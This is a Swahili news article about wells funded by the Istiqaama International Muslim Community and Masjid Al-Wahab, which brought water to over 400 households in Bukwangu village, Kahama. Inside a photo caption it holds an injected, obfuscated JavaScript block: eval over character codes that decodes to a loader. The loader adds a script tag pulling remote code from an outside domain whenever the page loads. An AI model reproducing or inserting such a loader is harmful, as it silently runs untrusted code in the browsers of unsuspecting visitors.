Recent Comments

INTERNATIONAL ISTIQAAMA WATATUA KERO YA MAJI KWA WANANCHI

By Baraka Bitariho Jun 9, 2020
<p>Katibu wa Masjid Al-awab,Kahama Ahmed Haroun akichota maji kwenye kisima kama sehemu ya uzinduzi</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Katibu wa Masjid Al-awab,Kahama Ahmed Haroun akichota maji kwenye kisima kama sehemu ya uzinduzi

Zaidi ya Kaya 400 katika Kijiji cha Bukwangu,kata ya Ntobo wilayani Kahama Mkoani Shinyanga zimeanza kupata huduma ya maji, huku wananchi wakieleza kuondokana na changamoto ya kutembea umbali mrefu na wakati mwingine kukutana na fisi wakati wakutafuta maji

 

Wakizungumza na www.simamia.com kwa nyakati tofauti baadhi ya wananchi wamesema awali walikuwa wakilazimika kutembea umbali mrefu kutafuta huduma ya maji katika mapori,huku usalama wa wa maisha yao ukiwa hatarini kutokana na uwepo wa wanyama wakali porini hasa fisi

 

Bw.Deus Simba ni mwenyekiti wa kitongoji cha Bukwimba ambaye kwa niaba ya wananchi amezungumzia huduma ya maji kufuatia visima 5 vilivyofadhiliwa na

 

Kushoto ni Katibu wa Masjid Al-Wahab Ahamed Haroun,na Mwenyekiti  wake Mohamed Hilary.

Baadhi ya wananchi wameuelezea mradi huo wa maji kuwa neema kwao.huku wakizitaja baadhi ya changamoto walizokuwa wakikutana nazo kabla ya kupatikana kwa huduma ya maji Kijijini humo kuwa ni kutebea umbali mrefu,kushindwa kutekeleza shughuli nyingine na kuhatarisha maisha kutembea Porini kutafuta maji.

 

Nchi ya Oman, kupitia Msikiti wa Al- wahab chini ya Jumuiya ya Kimataifa ya Kiislam Istiqama

 

Katikati,aliyesimama na kukunja mikono,ni mwenyekiti wa kitongoji cha Bukwangu Bw.Deus Simba akifuatilia Uzinduzi wa Kisima

Sheikh Mohamed Hilary, na Ahmed Haroun ni viongozi wa Mskiti wa Al wahab ambao ni wa wakilishi wa Istiqamaa International Muslim Community ambao wanasimamia uchimbaji wa Visima vya maji kwaajili ya wananchi, wametoa rai kwa wananchi kuvitunza na kusimamia usafi wa Visima hivyo